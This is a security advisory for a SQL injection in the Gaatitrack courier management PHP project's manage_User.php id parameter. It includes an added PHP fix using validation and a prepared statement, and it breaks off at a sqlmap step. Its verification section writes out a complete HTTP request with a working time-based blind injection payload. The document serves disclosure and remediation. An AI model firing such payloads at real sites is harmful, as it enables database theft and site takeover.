Gaatitrack courier management system has SQL injection vulnerabilities

Source code download: https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html

Version: 2023/10/27

Vulnerability Description: The system has an SQL injection vulnerability that allows attackers to obtain database information and gain control of the website by inserting malicious SQL statements.

Cause of the vulnerability: The vulnerability occurs in gaatitrack/manage_User.php. On line 5, the id parameter is concatenated from user-controlled input into the SQL query statement, resulting in SQL injection.
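
One way to fix the concatenation described above, shown as an added example rather than code from the Gaatitrack project: validate id as an integer and pass it as a bound parameter. The users table, the find_user helper and the in-memory SQLite database are assumptions made so the script runs on its own.

```php
<?php
// Added example, not the project's code. Schema, helper names and the
// SQLite in-memory database are assumptions so the script is self-contained.

function make_demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO users (id, name) VALUES (1, 'alice'), (2, 'bob')");
    return $pdo;
}

// Pattern the advisory describes (hypothetical reconstruction, do not use):
//   $sql = "SELECT * FROM users WHERE id = " . $_GET['id'];
// Here the request value becomes part of the SQL text itself.

function find_user(PDO $pdo, $rawId): ?array {
    // 1. Allow-list: id must be a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject before any query is built
    }
    // 2. Bound parameter: the value travels as data and is never parsed as SQL.
    $stmt = $pdo->prepare('SELECT id, name FROM users WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = make_demo_db();

// Inputs: a legitimate id, a constructed non-numeric value, and the id value
// from the request in this advisory after URL decoding.
$inputs = ['2', '2abc', '(select*from(select+sleep(3)union/**/select+1)a)'];
foreach ($inputs as $input) {
    $user = find_user($pdo, $input);
    echo $input, ' => ', $user === null ? 'rejected' : $user['name'], PHP_EOL;
}
```

Either control alone blocks the request shown in this advisory; using both keeps the query safe if the validation is later loosened.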

Vulnerability verification: After setting up the system, access local port 80.

Send the payload:

GET http://192.168.211.1/gaatitrack/manage_user.php?id=%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29 HTTP/1.1
Host: 192.168.211.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The response time is 3 seconds, as expected:

Verify using sqlmap: